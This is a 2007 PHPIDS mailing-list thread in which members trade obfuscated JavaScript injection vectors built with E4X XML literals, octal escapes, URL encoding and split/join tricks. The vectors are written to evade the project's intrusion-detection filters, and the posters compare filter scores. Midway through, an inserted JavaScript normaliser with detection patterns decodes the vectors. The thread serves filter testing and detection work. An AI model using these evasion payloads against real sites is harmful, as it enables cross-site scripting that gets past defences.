obfuscated javascript


thornmaker

Sep 16, 2007, 3:27:09 PM
to PHPIDS » Web Application Security 2.0
This is only partially related to the IDS, but working on these
injections inspired me to put together a demo page of some of the
weird stuff you can do with javascript. There is a brief writeup on
my site at http://p42.us/ including the link to the demo text. I had
to leave some of the obfuscation techniques out because I want it to
work in both Firefox and IE. Please let me know if you have any
suggestions for improvements!

By the way, I just tried the demo javascript (minus the script tags)
at demo.php-ids.org... It triggered 16 filters and a score of 71!

Mario Heiderich

Sep 16, 2007, 4:31:36 PM
to php...@googlegroups.com
@David: Sounds interesting but I can't find the link.

"DAMN! What a screwy language." (cite from p42 page)
Yes - I totally agree with you. Xorrer's latest vectors prove that once again ;)

Greetings,
.mario


thornmaker

Sep 16, 2007, 4:55:15 PM
to PHPIDS » Web Application Security 2.0
Hmm... I'll see about making the link more clear. In the meantime,
try this: http://p42.us/stuff/wtf.txt
and to see how it executes: http://p42.us/stuff/wtf.html


Gareth

Sep 16, 2007, 6:27:58 PM
to PHPIDS » Web Application Security 2.0
Here's one that didn't work but you might find the xml tags
interesting:-
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)

I think Mario was updating the filters when I tried this one, so it
didn't get through. If I had more time I'd write another one, but I'm
sure someone else will be able to use this idea.


Gareth

Sep 16, 2007, 8:43:53 PM
to PHPIDS » Web Application Security 2.0
How about this for obscure:-
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);

thornmaker

Sep 16, 2007, 11:19:07 PM
to PHPIDS » Web Application Security 2.0
I really like this html tags trick to assign variables... very
clever. I would add it to the JavaScript; however, it appears to only
work with Firefox. There are a couple of other Firefox-only ones...
such as 0[]() to execute a function rather than this[](). Perhaps
if people uncover more, I'll add a separate Firefox-only version.
Anyhow, thanks for the info Gareth!

Mario Heiderich

Sep 17, 2007, 3:25:13 AM
to php...@googlegroups.com
Yep - XML predicates only work with gecko. As long as you use valid X(HTM)ML you can handle it like a normal variable and perform xpath operations on it like this:

a=<a>
<b>
%3c%69%6d%67%2f%73%72%63%3d%31
%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e
</b>
</a>
document.write(unescape(a..b))


A while ago I gathered a few links on that issue here http://del.icio.us/.mario/e4x but unfortunately didn't have time to look into it any deeper. I am still of the opinion that there could be a way to mis-use this feature for CSRF on steroids...

Greetings,
.mario

--
_______________________
php-ids.org

xorrer

Sep 17, 2007, 5:08:54 AM
to PHPIDS » Web Application Security 2.0

Gareth

Sep 17, 2007, 5:11:12 AM
to PHPIDS » Web Application Security 2.0
@xorrer

Cool stuff man! I knew it :D

On Sep 17, 10:08 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> @Gareth
>
> You were right. http://groups.google.com/group/php-ids/msg/74ba23034387d28d

Gareth

Sep 17, 2007, 5:21:34 AM
to PHPIDS » Web Application Security 2.0
@xorrer I'm on MSN Messenger if you're interested in a new contact :)

Gareth

Sep 17, 2007, 7:27:57 AM
to PHPIDS » Web Application Security 2.0
This one is cool:-
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);

Gareth

Sep 17, 2007, 9:56:19 AM
to PHPIDS » Web Application Security 2.0
More XML based stuff:-
a=<r><s>eva</s><s>l</s><a>ale</a><a>rt</a><a>(1)</a></r>
0[a.s.text()](a.a.text()+'')

thornmaker

Sep 17, 2007, 11:41:28 PM
to PHPIDS » Web Application Security 2.0
good stuff everyone. it's fun having new things to play with

Gareth

Sep 18, 2007, 8:17:02 AM
to PHPIDS » Web Application Security 2.0
Eval + Unicode attack:-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

Gareth

Oct 4, 2007, 11:37:42 AM
to PHPIDS » Web Application Security 2.0
I thought this was cool, it gets a score of 5:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']([]):0

I'd get it to work around the filters, but I can't be arsed, plus I've got
a lot on. Tested under Opera; may work in IE though.
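
Added example (my own code, not from the thread and not PHPIDS's own Converter or rule set): a toy normaliser that undoes the string-building tricks behind the vectors posted in this thread, so that a plain signature check sees "eval", "alert(" or "javascript:" again. It covers the split/join vector above, Gareth's E4X concatenation and octal-escape posts, and the %XX-encoded string from Mario's unescape example. The regexes, the signature names and the sample inputs are my own constructions; the samples are the thread's vectors re-joined onto one line, except the octal case, which is given as the literal the inner eval receives, because the thread builds the backslashes at run time and a static pass cannot see them. That last point is the practitioner's caveat: decoding alone is never complete, which is why PHPIDS scores on structure (the odd `1,1,1,` padding, `0[...]` calls, quote and bracket density) as well as on decoded keywords.

```javascript
// Added example, not part of the thread or of PHPIDS. A small normaliser that
// reverses escape, split/join and concatenation obfuscation before a simple
// pattern check. Signature names and regexes below are constructed for the demo.

const SIGNATURES = {
  eval_call:     /\beval\b/,
  alert_call:    /\balert\s*\(/,
  js_uri:        /javascript\s*:/i,
  event_handler: /\bon\w+\s*=/i,
};

// Step 1: \uXXXX, \xXX, octal \NNN and URL %XX escapes -> literal characters
function decodeEscapes(s) {
  const fromHex = (_, h) => String.fromCharCode(parseInt(h, 16));
  return s
    .replace(/\\u([0-9a-fA-F]{4})/g, fromHex)
    .replace(/\\x([0-9a-fA-F]{2})/g, fromHex)
    .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)))
    .replace(/%([0-9a-fA-F]{2})/g, fromHex);
}

// Step 2: 'a:bzc'['split']('z')['join']([]) -> the string it evaluates to
function foldSplitJoin(s) {
  return s.replace(
    /'([^']*)'\['split'\]\('(.)'\)\['join'\]\((?:\[\]|'')\)/g,
    (_, lit, sep) => "'" + lit.split(sep).join('') + "'");
}

// Step 3: E4X literals used as strings, and '+'-concatenated literals:
//   ''+<s>eva</s>+<s>l</s>  ->  ''+'eva'+'l'  ->  'eval'
// Repeated until nothing changes, since one pass only merges neighbours.
function foldConcat(s) {
  let prev;
  do {
    prev = s;
    s = s
      .replace(/<(\w+)>([^<]*)<\/\1>/g, "'$2'")          // <s>x</s> -> 'x'
      .replace(/''\s*\+\s*'/g, "'")                       // ''+'x'  -> 'x'
      .replace(/'\s*\+\s*''/g, "'")                       // 'x'+''  -> 'x'
      .replace(/'([^']*)'\s*\+\s*'([^']*)'/g, "'$1$2'");  // 'a'+'b' -> 'ab'
  } while (s !== prev);
  return s;
}

function normalize(input) {
  return foldConcat(foldSplitJoin(decodeEscapes(input)));
}

// Names of the signatures that fire on the normalised input (insertion order).
function scan(input) {
  const n = normalize(input);
  return Object.keys(SIGNATURES).filter((k) => SIGNATURES[k].test(n));
}

// Constructed samples: the thread's vectors on one line. The octal sample is
// the literal the inner eval receives; the thread assembles it from b='\\'
// and o='0' at run time, which this static pass cannot follow.
const SAMPLES = {
  split_join:  "new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']([]):0",
  e4x_concat:  "o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);",
  octal:       "'\\141\\154\\145\\162\\164\\050\\061\\051'",
  url_encoded: "%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e",
};

for (const [name, v] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(12), '->', normalize(v), '|', scan(v).join(','));
}
```

Run with node; each line prints the decoded vector next to the signature names that fire on it. The split/join vector normalises to the plain `javascript:alert(1)` URI and the E4X one to `0['eval']('alert(1)')`-shaped code, both of which a keyword rule catches only after this folding step.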

Mario Heiderich

Oct 4, 2007, 12:09:46 PM
to php...@googlegroups.com
Nice ones! I added some extra spice to make that attack pattern more unlikely to slip through.

Let's start putting those kinds of beauties into the Wiki? What do you think?
https://trac.php-ids.org/wiki/VectorWiki

Greetings!
.mario
